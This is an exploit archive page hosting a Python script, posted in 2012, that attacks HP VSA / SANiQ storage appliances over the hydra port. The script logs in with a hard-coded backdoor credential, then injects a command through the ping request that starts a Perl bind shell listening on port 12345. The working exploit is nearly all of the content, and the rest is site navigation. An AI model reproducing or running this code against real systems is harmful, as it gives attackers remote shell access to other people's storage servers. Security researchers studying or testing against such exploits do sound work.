HP VSA Command Execution

HP VSA Command Execution: Posted May 18, 2012; Authored by Nicolas Gregoire; HP VSA remote command execution exploit.; tags | exploit, remote; SHA-256 | e2634c82bf61b7660279ef87efb9959dc4f17ce4f09dbbb9b22dc962a374b58e; Download | Favorite | View

HP VSA Command Execution

#!/usr/bin/python
 
''' ==================================
          Pseudo documentation
================================== '''
 
# HP VSA / SANiQ Hydra client
# Nicolas Grégoire <nicolas.gregoire@agarri.fr>
# v0.5
 
''' ==================================
          Target information
================================== '''
 
HOST = '192.168.201.11' # The remote host
PORT = 13838        # The hydra port
 
''' ==================================
             Imports
================================== '''
 
import getopt
import re
import sys
import binascii
import struct
import socket
import os
 
''' ==================================
        Define functions
================================== '''
 
# Some nice formatting
def zprint(str):
    print '[=] ' + str
 
# Define packets
def send_Exec():
    zprint('Send Exec')
     
    # RESTRICTIONS
    # You can't use "/" in the payload
    # No Netcat/Ruby/PHP, but telnet/bash/perl are available
 
    # METASPLOIT PAYLOAD
    cmd = "perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,12345,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'"
 
    # COMMAND INJECTION BUG
    data = 'get:/lhn/public/network/ping/127.0.0.1/foobar;' + cmd + '/'
 
    # EXPLOIT
    zprint('Now connect to port 12345 of machine ' + str(HOST))
    send_packet(data)
 
def send_Login():
    zprint('Send Login')
    data = 'login:/global$agent/L0CAlu53R/Version "8.5.0"' # Backdoor
    send_packet(data)
 
# Define the sending function
def send_packet(message):
 
    # Add header
    ukn1 = '\x00\x00\x00\x00\x00\x00\x00\x01'
    ukn2 = '\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00\x00\x00\x14\xff\xff\xff\xff'
    message = message + '\x00'
    data = ukn1 + struct.pack('!I', len(message)) + ukn2 + message
 
    # Send & receive
    s.send(data)
    data = s.recv(1024)
    zprint('Received : [' + data + ']')
 
''' ==================================
           Main code
================================== '''
 
# Print bannner
zprint('HP Hydra client')
zprint('Attacking host ' + HOST + ' on port ' + str(PORT))
 
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
s.connect((HOST, PORT))
 
# Attack !
send_Login()
send_Exec()
 
# Deconnect
s.close
 
# Exit
zprint('Exit')

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

HP VSA Command Execution

HP VSA Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

HP VSA Command Execution

Share This

HP VSA Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems